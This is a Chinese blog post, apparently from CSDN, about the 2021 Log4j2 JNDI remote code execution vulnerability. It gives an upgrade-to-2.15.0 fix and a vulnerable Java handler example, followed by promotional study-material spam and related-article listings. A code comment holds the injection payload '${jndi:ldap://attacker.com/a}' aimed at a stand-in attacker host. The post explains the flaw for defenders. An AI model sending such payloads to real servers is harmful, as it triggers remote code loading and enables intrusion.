不是吧。。Log4j2突发重大漏洞

最新推荐文章于 2024-07-16 17:29:42 发布
最新推荐文章于 2024-07-16 17:29:42 发布
阅读量725 收藏 24
点赞数 27
分类专栏: 程序员 文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83817418/article/details/137063111
版权

看到这些消息后,老王紧张的情绪一下子就缓解了下来,就像吃了一颗定心丸,赶紧去通知小二不用再提心吊胆了,直接一行代码搞定。

<log4j2.version>2.15.0</log4j2.version>

详情可参照 Spring Boot 官方这篇博客:

https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot

Gradle 构建的项目也有解决方案。

问题是解决了,不过老王没闲着。他从 Log4j2 官网公布的最新消息中琢磨出,本次远程代码执行漏洞正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记录到日志时,攻击者通过构造特殊请求,来触发 Apache Log4j2 中的远程代码执行漏洞,从而利用此漏洞在目标服务器上执行任意代码

那肯定会有小伙伴在好奇 JNDI 是什么东东?来看一下维基百科的解释。

Java命名和目录接口(Java Naming and Directory Interface,缩写JNDI),是Java的一个目录服务应用程序接口(API),它提供一个目录系统,并将服务名称与对象关联起来,从而使得开发人员在开发过程中可以使用名称来访问对象。

利用下面这段代码,攻击者可以通过JNDI来执行LDAP协议来注入一些非法的可执行代码。

public class VulnerableLog4jExampleHandler implements HttpHandler {

static Logger log = Logger.getLogger(log4jExample.class.getName());

/**

  • A simple HTTP endpoint that reads the request’s User Agent and logs it back.

  • This is basically pseudo-code to explain the vulnerability, and not a full example.

  • @param he HTTP Request Object

*/

public void handle(HttpExchange he) throws IOException {

String userAgent = he.getRequestHeader(“user-agent”);

// This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.

// The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}

log.info(“Request User Agent:” + userAgent);

String response = "

Hello There, " + userAgent + “!

”;

he.sendResponseHeaders(200, response.length());

OutputStream os = he.getResponseBody();

os.write(response.getBytes());

os.close();

}

}

先自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。

img

img

img

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频

如果你觉得这些内容对你有帮助,可以扫码领取!

img

那么如何才能正确的掌握Redis呢?

为了让大家能够在Redis上能够加深,所以这次给大家准备了一些Redis的学习资料,还有一些大厂的面试题,包括以下这些面试题

  • 并发编程面试题汇总

  • JVM面试题汇总

  • Netty常被问到的那些面试题汇总

  • Tomcat面试题整理汇总

  • Mysql面试题汇总

  • Spring源码深度解析

  • Mybatis常见面试题汇总

  • Nginx那些面试题汇总

  • Zookeeper面试题汇总

  • RabbitMQ常见面试题汇总

JVM常频面试:

Redis高频面试笔记:基础+缓存雪崩+哨兵+集群+Reids场景设计

Mysql面试题汇总(一)

Redis高频面试笔记:基础+缓存雪崩+哨兵+集群+Reids场景设计

Mysql面试题汇总(二)

Redis高频面试笔记:基础+缓存雪崩+哨兵+集群+Reids场景设计

Redis常见面试题汇总(300+题)

Redis高频面试笔记:基础+缓存雪崩+哨兵+集群+Reids场景设计
.(img-ZDJoe0gc-1711484816126)]

Mysql面试题汇总(二)

[外链图片转存中…(img-UieV3YqG-1711484816126)]

Redis常见面试题汇总(300+题)

[外链图片转存中…(img-tCHzD2tj-1711484816127)]
需要更多Java资料的小伙伴可以帮忙点赞+关注,点击传送门,即可免费领取!

2401_83817418
关注
  • 27
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
我鮳,Log4j2突发重大漏洞,我们也中招了。。
沉默王二
12-12 3万+
长话短说吧。 相信大家已经被 Log4j2 的重大漏洞刷屏了,估计有不少小伙伴此前为了修 bug 已经累趴下了。很不幸,我的小老弟小二的 Spring Boot 项目中恰好用的就是 Log4j2,版本特喵的还是 2.14.1,在这次漏洞波及的版本范围之内。 第一时间从网上得知这个漏洞的消息后,小二吓尿了。赶紧跑过来问老王怎么解决。 老王先是给小二提供了一些临时性的建议,比如说: JVM 参数添加 -Dlog4j2.formatMsgNoLookups=true log4j2.formatMsgNoLooku
Log4j2突发重大漏洞之解决方案
热门推荐
腾讯全栈-ITCJF
12-14 1万+
Log4j2突发重大漏洞解决方案
Log4j2突发重大漏洞
qq_43842093的博客
12-21 321
长话短说吧。 相信大家已经被 Log4j2 的重大漏洞刷屏了,估计有不少小伙伴此前为了修 bug 已经累趴下了。很不幸,我的小老弟小二的 Spring Boot 项目中恰好用的就是 Log4j2,版本特喵的还是 2.14.1,在这次漏洞波及的版本范围之内。 第一时间从网上得知这个漏洞的消息后,小二吓尿了。赶紧跑过来问老王怎么解决。 老王先是给小二提供了一些临时性的建议,比如说: JVM 参数添加 -Dlog4j2.formatMsgNoLookups=true log4j2.formatMsgNoLooku
Log4j2突发重大漏洞,我们也中招了
dean1966的博客
12-11 763
原文作者:沉默王二 相信大家已经被 Log4j2 的重大漏洞刷屏了,估计有不少小伙伴此前为了修 bug 已经累趴下了。很不幸,我的小老弟小二的 Spring Boot 项目中恰好用的就是 Log4j2,版本特喵的还是 2.14.1,在这次漏洞波及的版本范围之内。第一时间从网上得知这个漏洞的消息后,小二吓尿了。赶紧跑过来问老王怎么解决。老王先是给小二提供了一些临时性的建议,比如说: JVM 参数添加 -Dlog4j2.formatMsgNoLookups=true log4j2.formatMsgNoLook
JNDI RMI 注入(Log4j2漏洞
sun0322
12-24 8292
目录 ■相关知识 1.SLF4J(Simple logging Facade for Java) // 简单日志门面 ■(log4j2)漏洞 ■JNDI 注入代码实现(RMI) ■代码细节说明 1.javax.naming.Reference // 构造方法 2.代码中使用的服务如何构建 SimpleHTTPServer // (Python)快速共享目录 3.RMI的利用版本限制 4.问答 5.RMI(Remote Method Invocation)为远程方法调用 ●在攻击..
突发Log4j 再爆“史诗级”漏洞,Kafka、Elasticsearch等均受影响,速查!修复!...
Java精选
12-11 3163
点击上方“Java精选”,选择“设为星标”别问别人为什么,多问自己凭什么!下方有惊喜留言必回,有问必答!每天08:15更新文章,每天进步一点点...Log4j 2发布于2014年。Ap...
Log4j2看漏洞管理需要考虑的问题
NewTyun的博客
12-21 526
新钛云服已为您服务1348天最近Log4j2漏洞把甲乙方都折腾了一遍,让大家体会了一把“夜太美,尽管再危险总有人黑着眼眶熬着夜”。修复的方法和防护方式在朋友圈刷了一圈又一圈。这边就不再赘述...
突发Log4j 爆“核弹级”漏洞,Flink 等项目受影响,提供 Flink 解决方法,赶紧修!...
http://www.54tianzhisheng.cn/
12-11 669
昨天,你应急了吗?昨晚,对很多程序员来说可能是一个不眠之夜。12 月 10 日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏...
[ 新出漏洞篇 ] 核弹级漏洞 Log4j2 RCE 漏洞爆出,开发圈苦逼,安全圈过年,你赶上了吗 ?(外行都能看懂的漏洞分析)
qq_51577576的博客
12-16 4966
Log4j2相信大家不陌生了~~~哈哈哈哈。 相信大家已经被 Log4j2 的重大漏洞刷屏了。几乎没有互联网公司幸免。 估计有不少开发的小伙伴在此前为了修 bug 已经累趴下了。 估计也有不少安全圈的大佬靠着这个漏洞买房买车了~~~ 你~~~赶上了吗? 每每出现这种重大漏洞,开发岗的大佬们---苦逼,安全岗的大佬们---过年。哈哈哈哈 今天勒,我们就来聊一下 Log4j2 到底是个什么鬼 ? Log4j远程代码执行漏洞详解 中华人民共和国网络安全法 第二十七条 任何个人和.
Apache Log4j2 远程代码执行漏洞检测工具
12-15
漏洞影响了全球大量的网络服务,因此,快速、准确地检测和修复Log4j2漏洞变得至关重要。 针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。...
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
log4j2漏洞检测工具
05-07
Log4j2,一个广泛使用的Java日志框架,最近曝出的重大安全漏洞(CVE-2021-44228,被称为Log4Shell)引起了全球的关注。这个漏洞允许攻击者通过精心构造的日志输入执行远程代码,从而对系统造成严重威胁。为了解决这...
log4j log4j2 2.15.0漏洞解决
12-10
然而,近期Log4j2曝出的重大安全漏洞(CVE-2021-44228)引发了全球关注,这个漏洞被称为“Log4Shell”,严重影响了依赖Log4j2的各类应用系统的安全性。本文将详细介绍Log4j2 2.15.0版本如何解决这一漏洞,并探讨相关...
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
Log4j的原理及应用详解(二)
凛鼕将至的博客
07-12 1555
Log4j是Apache的一个开源项目,它是一个可靠、快速、灵活的日志框架(API),主要用于Java语言编写的应用程序中。始于1996年,作为记录E.U. SEMPER(Secure Electronic Marketplace for Europe)项目跟踪信息的API。经过大量的完善和蜕变,最终演进为Log4j。 本文将跟随《Log4j的原理及应用详解(一)》的进度,继续介绍Log4j。希望通过本系列文章的学习,您将能够更好地理解Log4j的内部工作原理,掌握Log4j的使用技巧
Log4j的原理及应用详解(五)
凛鼕将至的博客
07-14 813
Log4j是Apache的一个开源项目,它是一个可靠、快速、灵活的日志框架(API),主要用于Java语言编写的应用程序中。始于1996年,作为记录E.U. SEMPER(Secure Electronic Marketplace for Europe)项目跟踪信息的API。经过大量的完善和蜕变,最终演进为Log4j。 本文将跟随《Log4j的原理及应用详解(四)》的进度,继续介绍Log4j。希望通过本系列文章的学习,您将能够更好地理解Log4j的内部工作原理,掌握Log4j的使用技巧,
java反射
最新发布
qq_34358193的博客
07-16 943
因此,在大多数情况下,我们可以将反射和反射机制视为同一概念的不同表述方式。它们共同构成了Java语言中一种强大的动态特性,使得程序能够在运行时灵活地检查和修改自身的结构和行为。在实际编程中,掌握反射和反射机制的使用对于开发高度灵活和动态的程序具有重要意义。
Log4j的原理及应用详解(三)
凛鼕将至的博客
07-13 1739
Log4j是Apache的一个开源项目,它是一个可靠、快速、灵活的日志框架(API),主要用于Java语言编写的应用程序中。始于1996年,作为记录E.U. SEMPER(Secure Electronic Marketplace for Europe)项目跟踪信息的API。经过大量的完善和蜕变,最终演进为Log4j。 本文将跟随《Log4j的原理及应用详解(二)》的进度,继续介绍Log4j。希望通过本系列文章的学习,您将能够更好地理解Log4j的内部工作原理,掌握Log4j的使
VMSA-2021-0028.pdf
12-13
Apache Log4j漏洞(CVE-2021-44228)是一个严重的问题,它存在于Apache Log4j 2.x版本中,允许攻击者通过注入恶意代码来控制受影响的系统。这个漏洞被广泛认为是近年来最严重的安全事件之一,因为它影响了许多软件和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值